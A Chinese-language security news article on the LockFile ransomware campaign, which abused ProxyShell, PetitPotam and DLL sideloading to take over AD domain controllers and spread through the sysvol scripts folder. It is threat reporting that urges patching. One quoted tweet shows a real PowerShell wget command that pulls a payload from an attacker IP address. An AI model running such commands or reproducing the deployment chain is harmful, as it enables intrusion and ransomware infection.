勒索软件LockFile滥用PetitPotam漏洞，掌控AD网域服务器

新的勒索软件攻击大肆滥用近期公开的重大漏洞，而使得企业与组织难以招架。例如，赛门铁克揭露一起名为LockFile勒索软件的攻击行动，其中攻击者先是经由Exchange邮件服务器，入侵企业内部网络环境，接下来再借着PetitPotam漏洞（CVE-2021-36942），控制AD网域服务器，并感染内网的电脑。

这起攻击行动赛门铁克最早在7月20日发现，受害者是美国的金融组织，而该公司看到最新的攻击出现于8月20日，至少有10个组织遭到LockFile攻击，受害组织遍及全世界，但多数位于美国及亚洲。

对于LockFile受害组织的类型，包括制造业、金融服务、工程公司、法务公司、商业服务，以及旅游业等。

至于攻击者的身份为何？赛门铁克指出，根据骇客留下来的勒索讯息中，提供受害者联系的电子邮件信箱contact@contipauper[.]com，可能是与Conti相关的骇客组织所为。而这个勒索讯息的画面，也与日前攻击大型IT顾问公司Accenture的LockBit极为相似，但这两个勒索软件之间是否有所关连？赛门铁克没有进一步说明。

攻击者先占据Exchange服务器，再借由AD网域服务器“派送”勒索软件

针对于LockFile攻击的过程，赛门铁克提出进一步的说明。攻击者先是入侵Exchange邮件服务器，并下达PowerShell命令，试图使用Wget程式下载档案，但究竟攻击者下载了什么？赛门铁克表示不得而知，仅表示在发动勒索软件攻击之前，骇客会维持存取受害组织的网络数日。

直到即将植入勒索软件的前20至30分钟，攻击者会在上述遭到入侵的Exchange邮件服务器上，开始部署一组工具，分别是efspotato.exe、active_desktop_render.dll，以及active_desktop_launcher.exe等3个档案。

其中，efspotato.exe是PetitPotam漏洞的滥用工具，疑似来自GitHub上的概念性验证（PoC）工具；而active_desktop_launcher.exe是合法应用程序，它是中国酷狗音乐所推出的动态桌面软件（KuGou Active Desktop），攻击者将它用来侧载恶意程式库active_desktop_render.dll。

这个恶意DLL一旦被成功载入，就会企图解密服务器本机上一个名为desktop.ini的档案。如果这个INI档案成功解密，将会执行Shellcode。赛门铁克表示，目前他们尚未取得这个desktop.ini进行分析，而无法进一步说明过程中执行了那些行为。

而赛门铁克推测，这个加密Shellcode的用途，应该就是启动efspotato.exe，滥用PetitPotam漏洞攻击AD网域服务器。该公司强调，虽然微软已于8月的例行修补（Patch Tuesday）提供修补程式，但随后有资安研究人员指出，修补程式并未完全修补这项漏洞，而能够在已经安装修补程式的Windows服务器上重现。

一旦成功存取AD网域服务器，攻击者就会在网域服务器的指定资料夹（sysvol\\domain\\scripts）中，“部署”LockFile勒索软件相关档案，而上述提及的资料夹路径，就是所有的网络使用者向网域控制器执行身份验证时，用来部署指令码（Script）的资料夹。换言之，只要电脑使用者登入网域，电脑就会复制LockFile的档案并且执行，将电脑的档案加密。

攻击者入侵的管道竟是运用甫被揭露的Exchange重大漏洞ProxyShell

揭露此事的赛门铁克表明，本次攻击行动仍有多处细节仍不明朗，尤其是攻击者入侵Exchange服务器的手法，仍有待调查。不过，有资安研究人员根据蜜罐（Honeypot）所收集的情报，指出LockFile攻击者就是利用ProxyShell漏洞来下手。

资安研究人员Kevin Beaumont于8月21日指出，他的蜜罐在8月13日，侦测到滥用ProxyShell漏洞的攻击行动，骇客试图在蜜罐植入Webshell，而且，多数防毒软件无法识别这个Webshell档案有害。这个攻击引起Kevin Beaumont注意的原因，就是攻击来源IP地址与赛门铁克揭露的一致。

事隔3日，Kevin Beaumont看到骇客再度入侵蜜罐，并且下达新的攻击命令与植入LockFile档案。也就是说，攻击者最初入侵Exchange服务器的手段，就是滥用ProxyShell漏洞。

Another ProxyShell attack, actions on target:

"C:\\Windows\\System32\\cmd.exe" /c powershell wget http://209.14.0.234:55676/P0BV1KrEwh8Xgeo6ctNq https://t.co/5YxPBYPt9F

— Kevin Beaumont (@GossiTheDog) August 16, 2021

针对这项发现，Kevin Beaumont指出，虽然这组漏洞微软已于4月发布修补程式，但相较于另一组在3月修补的重大漏洞ProxyLogon，他认为攻击者滥用ProxyShell的门槛较低，而且大型组织很可能还没有安装修补程式，而导致攻击者能轻易入侵Exchange服务器。而ProxyShell已被骇客大肆滥用的现象，也使得美国网络安全及基础设施安全局（CISA）提出呼吁，企业应尽速修补Exchange服务器。

对于LockFile勒索软件攻击滥用ProxyShell漏洞的行为，也有另一家资安业者TG Soft揭露他们的看法，并公布了攻击流程图，指出攻击者在使用了efspotato.exe之后，使用了Vatet Loader来载入渗透测试工具Cobalt Strike，进而更动群组原则来散布勒索软件LockFile。